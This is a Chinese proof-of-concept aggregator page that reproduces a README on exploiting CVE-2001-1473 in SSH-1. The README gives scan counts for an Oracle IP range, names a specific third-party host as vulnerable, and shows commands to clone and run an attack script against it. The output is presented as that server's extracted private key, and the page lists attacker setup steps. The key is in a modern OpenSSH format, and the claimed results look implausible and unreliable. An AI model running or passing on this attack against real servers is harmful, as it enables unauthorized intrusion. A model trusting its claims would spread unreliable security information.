关联漏洞
标题:
SSH-1协议私钥计算漏洞
(CVE-2001-1473)
描述:SSH-1协议存在漏洞。远程服务器可以通过创建匹配目标Session ID但是使用比目标公共密钥更薄弱的公共密钥对的Session ID来进行中间人攻击以及重放客户端激励响应到目标服务器,攻击者可以计算相应私钥以及使用带有冒充目标的妥协密钥对的目标Session ID。
描述
cve-2001-1473
介绍
# How to exploit CVE-2001-1473
We employed a novel approach to an age-old vulnerability in the [SSH-1](https://packetstormsecurity.com/files/22442/ssh-1.2.30.tar.gz.html) protocol, as described by [CVE-2001-1473](https://nvd.nist.gov/vuln/detail/CVE-2001-1473). This vulnerability enables a Man-in-the-Middle (MITM) server to intercept an SSH-1 session between a client and a vulnerable server, potentially exposing the user's private key. However, executing a practical attack necessitates the client's usage of the attacking server as a hopping node and granting permission for unknown server keys, significantly increasing the complexity of a successful exploit.
Our adaptation of the original attack method enables the extraction of the SSH server's private key itself, offering access to the vulnerable server with sshd permissions. Notably, this modified approach eliminates the MITM requirement and can be executed directly against the vulnerable server.
# Statistics
The vulnerability scans performed across the Oracle IP range resulted in the following distribution:
```bash
awk '{print $1}' v* | sort | uniq -c | sort -rn
91 [CVE-2001-1473]
45 [CVE-2020-35489]
40 [CVE-2019-11248]
10 [tilda-takeover]
5 [CVE-2020-1938]
4 [wix-takeover]
4 [top-xss-params]
4 [CVE-2017-7269]
4 [CVE-2014-6271]
3 [CVE-2021-40822]
3 [CVE-2021-22205]
2 [nagios-default-login]
2 [CVE-2022-2185]
2 [CVE-2020-3452]
1 [vercel-takeover]
1 [symfony-profiler]
1 [htpasswd-detection]
1 [error-based-sql-injection:MySQL]
1 [CVE-2021-44228]
1 [CVE-2020-3187]
1 [CVE-2020-13700]
1 [CVE-2019-9670]
1 [CVE-2019-19781]
1 [CVE-2019-10232]
1 [CVE-2002-1131]
1 [apache-solr-file-read]
```
The CVE-2001-1473 vulnerability is widely distributed, rendering it highly appealing for exploitation.
# Example
One of the vulnerable hosts detected in nuclei scan:
```
[CVE-2001-1473] [tcp] [high] nmr.ioc.ac.ru:22
```
Launching an attack:
```text
git clone git@bitbucket.org:0xsky/cve-2001-1473.git
cd cve-2001-1473
npm i
node src/run.js -t nmr.ioc.ac.ru
pk retrieved:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA18RGKpk+UHIKVDnRcaoHI97YDp1mAu+9gMcako/uFZkRFG1p/XHz
CL+/EZ9cGc0KT6fRzAGHxxfeJ4j4gsAFzBFaMWx2jfEinduSQGdxi4JtdqCY2Y8+YrIORg
mpOtwi+Pxue1R4JndIhH+AXVUptODrU1clBtZePcLd5aG4JVzyX0c2+BA0ekadyhAySvqS
bTCTQNVt0eB0JUmHjYh3FIk9AjnAnDe6F7iPeq0dPwfSAY13QS3WGX38tMWjDHntrWACEf
9zE9QCDDquwM3hs3cah9c+jzvDK2AKD3EOwXHF8Df4CHZ2L4x3AXqxbRgZZE3+nTa0Dt4h
ITAsyKp7a0DVzCwtK0DB1LfUPkWnxeIMcZQkTdcjypr9/9VqgacHvZjmKOf3utBglHfnWk
...
```
# Attacking system requirements
## Node installed
The easiest way is to use [nvm](https://github.com/nvm-sh/nvm).
## The POC
```
git clone git@bitbucket.org:0xsky/cve-2001-1473.git
```
## 8022 port unfiltered
The target SSH server establishes a connection with the attacking server via port 8022 for key exchange. Ensure that this port is unfiltered. If working from Kali's VirtualBox, ensure incoming traffic to the port is permitted from the host. Additionally, if the host is connected to a home network router, enable port forwarding on the router.
The easiest method involves using a dedicated or VPS server (such as Amazon or any other provider) with port 8022 unblocked.
The simplest way is to use dedicated / vps server (amazon or any other provider) with 8022 port unblocked.
## Attacking time
Cracking the MD5 of the server challenge and SID sent by the vulnerable server to port 8022 might require some time, particularly on older systems. The script assesses the cracking rate and provides an estimated time, which can vary from minutes to hours.
# Script command line options
* `-h, --help`: provides command line option summary
* `-t [ip|hostname], --target [ip|hostname]`: the target system
* `-v, --verbose`: be more verbose
Good luck.
文件快照
[4.0K] /data/pocs/2d103b60e0755fefd4c463a81b81a9447b843177
├── [ 209] package.json
└── [3.8K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。